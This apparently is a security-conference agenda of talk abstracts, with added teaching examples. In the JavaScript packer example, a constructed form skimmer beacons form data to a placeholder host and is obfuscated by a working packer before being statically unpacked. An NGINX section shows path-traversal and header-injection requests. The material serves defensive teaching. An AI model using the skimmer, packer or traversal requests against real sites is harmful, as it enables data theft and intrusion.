XDR and SIEM on a Collision Course: What Remains When the Dust Settles?

Detection and response is ripe for disruption or at least better tool integration. In this context, XDR makes sense as a means to help security analysts reduce dwell time and conduct more threat hunting. Looking ahead, how do security operations change, and what is the role of SIEM, SOAR, EDR, and NDR in an XDR […]

Security Operations and the End of Cyber Risk

Cyber risk is a business risk. Unfortunately, the cybersecurity industry has struggled to reduce it for organizations. Every year new technologies, vendors, and solutions emerge, and yet despite this constant innovation we continue to see high-profile breaches in the headlines. In this session we will cover the practical approaches you can […]

Detection at Scale – Realize Cyber Resilience Using Intelligence-Driven XDR

Is your lack of automation holding your threat intelligence, security operations, and the rest of your organization back? Many of today’s organizations understand the value of intelligence-driven extended detection and response (XDR) but are running into challenges when leveraging it. Anomali’s Chief Product Officer, Mark Alba, will share how XDR allows you to identify […]

Many Stunts, One Design: A Crash Course in Dissecting Native IIS Malware

Internet Information Services (IIS) is Microsoft’s web server software for Windows. It has an extensible, modular architecture that lets developers replace or extend core IIS functionality. This session looks at how that same extensibility is misused by threat actors to intercept or modify network traffic flowing through IIS servers. These powers allow IIS […]

How We Automated Ourselves Out of On-Call Burnout … and You Can Too!

The repetitive nature of response tasks is one of the biggest causes of fatigue and burnout among Incident Responders. Anyone who’s been on-call on a Security team can remember how many hours they’ve spent opening the same tabs, clicking the same buttons, copy+pasting the same indicator data, and performing other similar tasks repeatedly. Imagine if […]

Secure and Scalable Development with Microsoft 365 and Azure AD

In this talk we’ll focus on leveraging Azure AD in Platform as a Service projects. We’ll start with Logic Apps as a no-code Web API platform for implementing your privileged code in a zero-trust architecture. Azure AD provides secure authentication between low-trust client-side code and Logic Apps, and Logic Apps should use delegated or service […]

JavaScript Obfuscation – It’s All About the Packers

The use of JavaScript obfuscation techniques has become prevalent in today’s threats. From phishing pages to Magecart, supply chain injection to JavaScript malware droppers, they all use JavaScript obfuscation techniques on some level. The use of JavaScript obfuscation enables evasion of detection engines and poses a challenge to security professionals, as it hinders them from getting […]

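The abstract names packers as the common thread, so here is an added example written for this page (not the speaker’s code and not any real packer) that shows the shape all of them share: an encoded data blob, a short decoder stub, and eval() as the sink. The payload is a constructed, harmless stand-in for a form skimmer pointed at the placeholder host collector.example; the stub layout, the token-table encoding and the triage heuristic are choices made for this illustration. The point for an analyst is the unpack() function, which recovers the payload statically, without ever executing the stub.

```javascript
// Added example: a toy packer, its static unpacker, and a coarse triage check.
// Illustrative code for this page, not a real packer family.

// Tokenizer chosen so that tokens.join("") === src: identifiers, digit runs,
// whitespace runs and single other characters together cover every character.
const TOKEN_RE = /[A-Za-z_$][\w$]*|\d+|\s+|[^\w\s$]/g;

// Packer side. The payload becomes a string table (one-byte XOR + base64) and
// an index list that replays the tokens; a stub rebuilds the text and evals it.
function pack(src, key = 0x5a) {
  const tokens = src.match(TOKEN_RE) ?? [];
  const table = [...new Set(tokens)];
  const indices = tokens.map((t) => table.indexOf(t));
  const xored = Buffer.from(table.join("\u0001"), "utf8").map((b) => b ^ key);
  const blob = Buffer.from(xored).toString("base64");
  // What you see in the wild is this stub: a few lines of decoder feeding eval().
  return (
    'eval((function(d,k,i){var t=Buffer.from(d,"base64").map(function(b){return b^k});' +
    'var s=Buffer.from(t).toString("utf8").split("\\u0001");' +
    'return i.map(function(n){return s[n]}).join("")})' +
    `("${blob}",${key},[${indices.join(",")}]))`
  );
}

// Analyst side: recognise the stub by its trailing argument list and reverse
// the encoding directly. In practice there is one such matcher per packer
// family (or an AST-based pass); the key point is that nothing is executed.
const STUB_ARGS_RE = /\("([A-Za-z0-9+\/=]*)",(\d+),\[([\d,]*)\]\)\)$/;

function unpack(packed) {
  const m = STUB_ARGS_RE.exec(packed);
  if (!m) throw new Error("unrecognised stub");
  const [, blob, key, idx] = m;
  const raw = Buffer.from(blob, "base64").map((b) => b ^ Number(key));
  const table = Buffer.from(raw).toString("utf8").split("\u0001");
  const indices = idx === "" ? [] : idx.split(",").map(Number);
  return indices.map((n) => table[n]).join("");
}

// Triage signal: an eval/Function sink next to a long base64-looking literal.
// It misses packers that use atob/String.fromCharCode or split the blob, but
// it separates packed from plain code cheaply enough for a first pass.
function looksPacked(code) {
  const hasSink = /\b(?:eval|Function)\s*\(/.test(code);
  const hasBlob = /["'][A-Za-z0-9+\/=]{64,}["']/.test(code);
  return hasSink && hasBlob;
}

// Constructed payload: the behaviour of a skimmer (read a form, beacon it
// away) against a placeholder host. Not taken from any real sample.
const SKIMMER = [
  'document.querySelector("form").addEventListener("submit", function (e) {',
  '  navigator.sendBeacon("https://collector.example/c", new FormData(e.target));',
  "});",
].join("\n");

const packed = pack(SKIMMER);
console.log(packed.slice(0, 80) + "...");
console.log(looksPacked(packed), unpack(packed) === SKIMMER); // true true
```

Run it with node; the packed output contains no plaintext from the payload (no "sendBeacon", no hostname), which is exactly why signature engines keyed on those strings miss it, and why recovering the table statically matters more than matching the stub.
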
BioHackers: The Invisible Threat

Biohackers exist and walk among us. Most security professionals would not allow users into their environment with offensive security tools. How do you address individuals who have surgically implanted such devices into their bodies? I have multiple sub-dermal implants that range from NFC, HID/Prox and RFID devices. This allows me to become the attack vector. […]

The Quantum Threat: Where Are We Today?

Quantum computers will break currently deployed public-key cryptography (RSA, ECC, Diffie-Hellman, etc.) which is one of the pillars of modern-day cybersecurity. Thus, we need to migrate our systems and practices to ones that cannot be broken by quantum computers before large-scale quantum computers are built. First, I will give an update on the “quantum threat-timeline”. […]

Redefining Threat Modeling: Security Team Goes on Vacation

Threat Modeling is an important part of every company’s Security Development Lifecycle, but as development teams grow bigger, Security will have to choose which features they want to Threat Model or they will become a bottleneck for the development organization. What if I told you, you could have your cake and eat it too? It […]

Epic journey of an enterprise cloud transformation

This session delivers two different real-life examples of an enterprise cloud transformation with emphasis on security implementation. You will get an insight into security architecture details across three main categories: security and data privacy integration bottom-up, applying security in depth by peeling down the layers of defense, and breaking down the setup of secure cloud […]

The Cross-Disciplinary Challenges of Data Governance Policies

Numerous data governance laws and policies have been enacted to protect user privacy. Policies may define data retention (how long the data must be kept), data purging requirements (when the data must be destroyed), and data consent (whether the data can be used for a particular purpose). To comply with these requirements and to minimize […]

Software Composition Analysis 101: Knowing What’s Inside Your Apps

The term Software Composition Analysis (SCA) is relatively new to the security world. However, similar approaches have been used since the early 2000s to describe security verification of open-source components, and SCA is an evolution of that. It is the process of identifying and listing all the components and versions present in the code and […]

An Anatomy of a DevOps Tool Chain Attack

Businesses are building their digital transformation strategies around in-house development and embracing the DevOps philosophy and associated tooling. However, DevOps tooling is commonly insecure by default, misconfigured, and reliant on the open-source community to keep things up to date and secure. While cyber security folks are catching up with how to secure the Cloud and […]

Sandboxing in Linux with Zero Lines of Code

Linux seccomp is a simple, yet powerful tool to sandbox running processes and significantly decrease potential damage in case the application code gets exploited. It provides fine-grained controls for the process to declare what it can and can’t do in advance and in most cases has zero performance overhead. The only disadvantage: to utilise this […]

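The abstract is cut off before it says how the talk reaches zero lines of code, and the mechanism below is not claimed to be the speaker’s. It is an added example for this page of one zero-code route that already exists on systemd-based distributions: declaring the process’s allowed system calls in a unit drop-in, which systemd turns into a seccomp filter before the service starts. The unit name myapp.service and the choice of groups are assumptions; the directives themselves are documented in systemd.exec(5).

```ini
# /etc/systemd/system/myapp.service.d/sandbox.conf   (assumed unit name)
# Added example, not the talk's tooling: a seccomp profile with no code changes.
[Service]
# The kernel lets an unprivileged process install a seccomp filter only with
# no_new_privs set (or CAP_SYS_ADMIN). systemd implies this for services that
# lack CAP_SYS_ADMIN; stating it also stops setuid helpers from escalating.
NoNewPrivileges=yes

# Allow-list: only the @system-service group, roughly what an ordinary daemon
# needs. Every system call outside it is refused.
SystemCallFilter=@system-service

# Deny-list layered on top: drop groups a network service should never touch
# (mount/reboot/kexec style calls, and resource-limit changes).
SystemCallFilter=~@privileged @resources

# During rollout, return an error instead of SIGSYS so a missed call surfaces
# in the journal as EPERM rather than as a crash. Remove this line once the
# profile is stable so a blocked call terminates the process again.
SystemCallErrorNumber=EPERM

# Refuse the non-native ABI (for example 32-bit calls on x86_64) so a filter
# keyed to one system call table cannot be side-stepped through another.
SystemCallArchitectures=native
```

To see what a group contains before trusting it, run `systemd-analyze syscall-filter @system-service`; to find what a binary actually needs, run it once under `strace -f -c` and compare. `systemd-analyze security myapp.service` reports the remaining exposure after `systemctl daemon-reload`. The caveat the abstract hints at still applies: the filter is only as good as the allow-list, and an application that later starts using a new system call will fail in production unless the profile is revisited.
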
Zero-Code Data Validation

It’s 2021, so why are developers still spending so much time writing custom code to validate data? Does the custom code cover all vulnerabilities? Is it secure? This presentation introduces a new open-source framework called Sanitation Web Application Firewall (SanWAF) that uses a declarative approach to validate data on both the client and server tiers. […]

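SanWAF’s own API is not shown on this page, so the block below is an added illustration of the declarative idea in general, written for this page and not SanWAF code: one schema object is the single source of truth, the browser evaluates it for early feedback, and the server evaluates the same rules on the raw request body because the client tier can always be skipped with curl or a proxy. The field names, the hypothetical handleSignup() handler and the error strings are assumptions of the example.

```javascript
// Added example (not SanWAF): a declarative rule set shared by both tiers.

// The schema is data, not code. Each field states what is acceptable; fields
// absent from the schema are rejected, which hand-rolled validators often omit
// (mass-assignment of an "isAdmin" field is the classic result).
const signupSchema = {
  username: { type: "string", minLength: 3, maxLength: 32, pattern: /^[a-z0-9_]+$/ },
  email:    { type: "string", maxLength: 254, pattern: /^[^\s@]+@[^\s@]+\.[^\s@]+$/ },
  age:      { type: "integer", min: 13, max: 120 },
  plan:     { type: "string", enum: ["free", "pro"] },
};

function validate(schema, input) {
  const errors = [];
  if (input === null || typeof input !== "object" || Array.isArray(input)) {
    return { ok: false, errors: ["body must be a JSON object"] };
  }
  // Own-property check, not `in`: keys such as "constructor" or "__proto__"
  // are found on Object.prototype and would slip past a plain `in` test.
  for (const key of Object.keys(input)) {
    if (!Object.prototype.hasOwnProperty.call(schema, key)) {
      errors.push(`${key}: unexpected field`);
    }
  }
  for (const [field, rule] of Object.entries(schema)) {
    const value = input[field];
    if (value === undefined) { errors.push(`${field}: required`); continue; }
    if (rule.type === "integer") {
      if (!Number.isInteger(value)) { errors.push(`${field}: must be an integer`); continue; }
      if (rule.min !== undefined && value < rule.min) errors.push(`${field}: below ${rule.min}`);
      if (rule.max !== undefined && value > rule.max) errors.push(`${field}: above ${rule.max}`);
    } else {
      if (typeof value !== "string") { errors.push(`${field}: must be a string`); continue; }
      if (rule.minLength !== undefined && value.length < rule.minLength) errors.push(`${field}: too short`);
      if (rule.maxLength !== undefined && value.length > rule.maxLength) errors.push(`${field}: too long`);
      if (rule.pattern && !rule.pattern.test(value)) errors.push(`${field}: bad format`);
      if (rule.enum && !rule.enum.includes(value)) errors.push(`${field}: not one of ${rule.enum.join("/")}`);
    }
  }
  return { ok: errors.length === 0, errors };
}

// Client tier: the browser runs the same rules for immediate feedback.
function clientCheck(formValues) {
  return validate(signupSchema, formValues);
}

// Server tier: the rules run again on the raw body. The client result is
// never trusted; it only saved a round trip for honest users.
function handleSignup(rawBody) {
  let parsed;
  try {
    parsed = JSON.parse(rawBody);
  } catch {
    return { status: 400, errors: ["invalid JSON"] };
  }
  const result = validate(signupSchema, parsed);
  return result.ok ? { status: 201, errors: [] } : { status: 400, errors: result.errors };
}

// Constructed inputs: one honest submission and one that skipped the browser.
const honest = { username: "alice_01", email: "alice@example.org", age: 30, plan: "pro" };
const hostile = { username: "<script>alert(1)</script>", email: "x", age: 9, plan: "gold", isAdmin: true };
console.log(clientCheck(honest).ok, handleSignup(JSON.stringify(honest)).status);   // true 201
console.log(handleSignup(JSON.stringify(hostile)).errors);
```

The design choice worth noting is that the rule set never expresses "strip the dangerous characters": it states the allowed shape and rejects everything else, so output encoding for the page or the database stays a separate, context-specific step rather than being smuggled into input validation.
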
Breaking the Laws of Robotics: Attacking Automated Manufacturing Systems

Automated manufacturing systems (particularly within the paradigm of so-called Industry 4.0) are complex and critical cyber-physical systems. They use robots (highly sophisticated systems themselves, with multiple complex embedded controllers), several types of industrial controllers, and are often interconnected with other computers in the factory network, safety systems, and to the Internet for remote monitoring and […]

Hacking & Securing Clinical Technology

This talk highlights the challenges of securing the clinical and IT infrastructure of healthcare delivery organizations. We’ll dive into two examples of FDA-approved devices that connect to clinical equipment common in hospitals today and walk the audience through the development of full device compromise and the discovery of multiple CVEs.

Automating Threat Detection and Response with Azure Sentinel

As more businesses move to Azure for their cloud computing, there is a growing gap in visibility of the security of cloud resources. Azure Sentinel is the cloud native SIEM solution from Microsoft. Turning it on potentially means another location for piles of logs and noise. Attend this session to learn how to get the […]

Common NGINX Misconfigurations That Leave Your Web Server Open to Attack

NGINX is the web server powering one-third of all websites in the world. Detectify’s Security Research team analyzed almost 50,000 unique NGINX configuration files downloaded from GitHub with Google BigQuery and discovered common misconfigurations that, if left unchecked, leave your web site vulnerable to attack. This training will walk through the most common issues, including […]

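The abstract is cut off before it lists the issues, so the block below is an added illustration for this page rather than Detectify’s material: three misconfigurations that are widely documented for NGINX, each shown in its weak form beside the fix. Paths, hostnames and the upstream address are placeholders; the weak and fixed server blocks are alternatives and are not meant to be loaded together.

```nginx
# Added example, not from the talk: common NGINX misconfigurations and fixes.

# WEAK: the location has no trailing slash but the alias does. A prefix match
# on "/static" also catches "/static../", so
#   GET /static../app.conf
# maps to /srv/app/static/../app.conf and reads outside the directory.
location /static {
    alias /srv/app/static/;
}

# FIXED: make the two agree, so only paths under /static/ reach the alias.
location /static/ {
    alias /srv/app/static/;
}

# WEAK: a server-wide root that also holds configuration or secrets. Every
# location without its own root (here the proxied API) inherits it, so a
# request for /nginx.conf is served as a plain static file.
server {
    listen 80;
    server_name app.example;
    root /etc/nginx;
    location /api/ {
        proxy_pass http://127.0.0.1:8080;
    }
}

# FIXED: point root at a directory that holds nothing but public content.
server {
    listen 80;
    server_name app.example;
    root /srv/app/public;
    location /api/ {
        proxy_pass http://127.0.0.1:8080;
    }
}

# WEAK: $uri is the decoded, normalised request path, so %0d%0a in the
# request becomes a real CR LF inside the Location header (header injection).
location /old/ {
    return 302 https://app.example$uri;
}

# FIXED: $request_uri is the raw, still-encoded original request line.
location /old/ {
    return 302 https://app.example$request_uri;
}
```

Two checks are worth building into review: `nginx -T` prints the fully merged configuration, which is where an inherited `root` or an `alias` under a slash-less `location` becomes visible across include files, and `curl --path-as-is 'http://app.example/static../app.conf'` reproduces the traversal without the client normalising the path away first.
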
Broken Brokers in Boxes: Fuzzing Breaks Everything, Even Erlang

Behind the scenes of a trio of recently disclosed vulnerabilities are two innovations. First, putting fuzzing targets in containers makes memory exhaustion much easier to observe. Second, widening our definition of failure makes it possible to locate vulnerabilities even in “safe” environments like Erlang. This presentation begins with a brief review of fuzzing, focusing on […]

Harder, Better, Faster, Stronger – Privacy Laws and the Anatomy of a Breach Response

In late 2020, the Canadian government proposed the Digital Charter Implementation Act, intending to modernize the framework for the protection of personal information in the private sector. Stemming from this Act, the Privacy Commissioner of Canada is set to receive more power to investigate privacy infractions and issue orders and fines. Simultaneously, Ontario is developing […]

Moving Upstream, Securing the GitOps Workflow

A recent study suggests that cloud misconfiguration is the number one risk to cloud environments in 2021. As more developers deploy infrastructure across clouds using infrastructure-as-code, the security risk is only going to grow. To quote Albert Einstein: “Intellectuals solve problems, geniuses prevent them.” With IaC, we have an opportunity to scalably prevent security risks […]

Introducing a New Construct for Advanced Interactive Volatile Memory Analysis

Malware continues to advance in sophistication and prevalence. Well-engineered malware can obfuscate itself from the user, network, and even the operating system running host-based security applications. One place malware cannot easily hide itself is within volatile computer memory (RAM). Although an essential part of detection engineering and exploit development, memory analysis is not trivial to […]

Speeding Up AWS IAM Least Privileges with CloudSplaining & Elastic Stack

In talking about Cloud Security, I believe that there are 3 main points to take care of: IAM permissions, control plane configuration (the AWS API), and CloudTrail for control plane monitoring. When we are talking about cloud misconfiguration, permissions, and monitoring, we are mostly talking about second-stage attacks (except for configurations that make information public) […]

Explore Adventures in the Underland: Forensic Techniques Against Hackers

Cybercrime is a very lucrative business not just because of the potential financial return, but because it is quite easy to get away with it. Sometimes hackers get caught, but most of the time they still run free. When it comes to the operating system and after-attack traces, it is not that bad as all […]

Adventures in Underland: What Your System Stores on the Disk Without Telling You

Even though you are the only person using a computer, you are not the only one writing to your disk drive! Surprisingly, your disk drive contains a lot of juicy information that can reveal a lot of secrets and history about what you did in the past. There are also places where data can be […]

Attacker Techniques: Data Exfiltration

Data exfiltration, or data theft, is a common event that occurs during a breach. This talk will go into detail on specific tools and techniques that attackers have used to exfiltrate data from victim organizations and the ways that we can identify evidence of data access, data staging or data theft. By understanding how attackers […]

Building Security Champions

With security teams being vastly outnumbered, many organizations have responded to this challenge with different program scaling methods, including building security champions programs. Which leads us to questions: How does a security champions program work? How do you select your champions? And once you have them, what do you DO with them? This session will […]

Maturing your toolkit with mental models

Ask anyone about “infosec tools” and the list will depend on red/blue perspective and experience but will usually include the likes of BloodHound, Metasploit, Burp, Mimikatz, Cobalt Strike, Nmap, and Netcat. These are all great, but too often we ignore that there is a separate side to infosec: there is a “non-technical” dimension we all […]

hAFL1: Our Journey of Fuzzing Hyper-V and Discovering a 0-Day

In this session, we present hAFL1 and provide the implementation bits required to write a Hyper-V fuzzer. We uncover a critical 0-day in Hyper-V vmswitch which was found using our fuzzer – an arbitrary read vulnerability. Finally, we show a live demo of exploiting this vulnerability, which until only a few weeks ago could take […]

Full Circle Detection: From Hunting to Actionable Detection

How do you create new efficient, accurate, and resilient detection rules? There are a lot of steps to follow. This talk will take you through what I call Full Circle Detection. I’ll start with where to get hunting ideas and then move on to giving a turnkey alert to your Security Analysts, using a real-world step by […]

FAIL – Notorious* Number 9

Lessons learned over the course of a protracted global emergency that has fundamentally altered society and how we do business are not being well learned and are not yet reflected in how we manage and assess our work. Time to talk through the 9th round of fails with our panel of distinguished guest speakers!

Large-Scale Security Analysis of IoT Firmware

Today, the number of IoT devices in both the private and corporate sectors is steadily increasing. IoT devices like IP cameras, routers, printers, and IP phones have become ubiquitous in our modern homes and enterprises. To evaluate the security of these devices, a security analysis must be performed for every single device. Since manual analysis […]

Ghost Misdetection Attacks Against Tesla Model X & Mobileye 630 PRO

Many studies have discussed the implications of using a training process to develop artificial intelligence: the significant computing capabilities required, the energy wasted, the high cost, the time required for training, the size of the dataset needed. However, the fact that automated driving is considered safer than manual driving proves that the training process is […]

Detecting Illicit Drone Filming

In an “open skies” era in which drones fly among us, a new question arises: how can we tell whether a passing drone is being used by its operator for a legitimate purpose (e.g., delivering pizza) or an illegitimate purpose (e.g., peeking at a person showering in his/her own house)? In this talk, I present […]

Drinking Coffee, Unicorns & Demystifying Zero Trust

So exactly what is zero trust? Buzzword, unicorn technology or a framework with meat on the bone? Well, yes on two counts. Zero trust is the realization that everything is on fire. In this talk I will endeavor to strip the idea of a zero trust program back to the bare metal. We will have […]

Compliant Yet Vulnerable: Critical Risks of Measuring Instruments in Production Line

In this talk, we are going to review the LAN eXtensions for Instrumentation (LXI), a common protocol among testing and measuring devices. Most legacy wired protocols function on the assumption that they are interconnected in a closed, trusted, secure network. However, once connected to the internet this assumption is no longer true. LXI is one […]

Threat Hunting Intelligently

Although times are unprecedented, for threat actors, it is business as usual. Even as times change, good threat intelligence will always be a bedrock of cybersecurity. Join Senior Security Research Consultant and Secureworks’ Threat Hunting lead Ryan Cobb, as he shares what’s on the threat horizon and how the Secureworks team is there to keep […]

A Savvy Approach to Leveraging MITRE ATT&CK

MITRE ATT&CK has shifted the balance of power from attackers to defenders. For the past few years, defenders have been increasing their security tooling and are detecting more adversarial techniques than ever before. Detecting events in your environment is only the first step. Going forward the focus isn’t going to be on if you detect […]

PKI Well Revised: Common Mistakes Which Lead to Huge Compromise of Identity

All technologies and systems currently use cryptography and most use certificates at some point. Since their boom, internal PKI systems have not changed a lot nor have the problems that we observe during almost all pentests. It’s time to revise your knowledge about one of the cornerstones of enterprise security and learn a few tricks […]

An Introduction to Automotive Security in 2020

As cars continue to become more connected and autonomous, the security of these systems grows in importance. We’re now a decade on from the first public research on automotive security, and since then the challenges of securing these vehicles have increased due to new features, connectivity, and automation. In this talk, we’ll provide an introduction […]

Escaping Virtualized Containers

Containers offer speed, performance, and portability, but do they actually contain? While they try their best, the shared kernel is a disturbing attack surface: a mere kernel vulnerability may allow containerized processes to escape and compromise the host. This issue prompted a new wave of sandboxing tools that use either unikernels, lightweight VMs or userspace-kernels […]

Practical Defenses Against Adversarial Machine Learning

Adversarial machine learning has hit the spotlight as a topic relevant to practically-minded security teams, but noise and hype have diluted the discourse to gradient-based comparisons of blueberry muffins and chihuahuas. This fails to reflect the attack landscape, making it difficult to adequately assess the risks. More concerning still, recommendations for mitigations are similarly lacking […]

Identifying and Defending the Perimeter With Attack Surface Management

The need to operate online has driven businesses toward a digital transformation with cloud adoption at its core. The pace of this transformation sped up drastically as COVID-19 dispersed entire workforces and business operations around the world. In a matter of days, operating a business with an entirely “at home” workforce became the norm. And […]

Using Threat Metrics for Better Information Security Program Efficacy – Leveraging MITRE ATT&CK

Information Security leaders face a problem: to prove the value equation of their security investments. Security efficacy is often brought up as a key challenge – not just how to leverage technology, but how to measure what results it delivers. Enumerating how many detections were surfaced by a malware defense platform or if a perimeter […]

Security Transformed

Preceding the outbreak of COVID-19 was a trend across industries to transform the traditional IT stack into a new form of computing, one that was focused on enabling agility and innovation while also delivering cost reduction. This shift sought to leverage public cloud and cloud-like development methods as well as infrastructure design. The effort to […]

How to Automate Security Validation and Reduce Enterprise Security Risk

Cybersecurity software has evolved by leaps and bounds in the past decade. However, one domain was neglected and has fallen behind – security validation. Today, the measurement of a network’s cyber posture is done in a manual, non-scalable way, through costly third-party pentesting service providers. As a result, a huge gap has been created between […]

Lateral Movement and Privilege Escalation in GCP; Compromise any Organization without Dropping an Implant

Google Cloud’s security model in many ways is quite different from AWS. Spark jobs, Cloud Functions, Jupyter Notebooks, and more default to having administrative capabilities over cloud APIs. Instead of defaulting to no capabilities, permissions are granted to default identities. One default permission these identities have is called actAs, which allows a service by default […]

Demystifying Modern Windows Rootkits

This talk will demystify the process of writing a rootkit, moving past theory and instead walking the audience through the process of going from a driver that says “Hello World” to a driver that abuses never-before-seen hooking methods to control the user-mode network stack. Analysis includes common patterns seen in malware and the drawbacks that […]
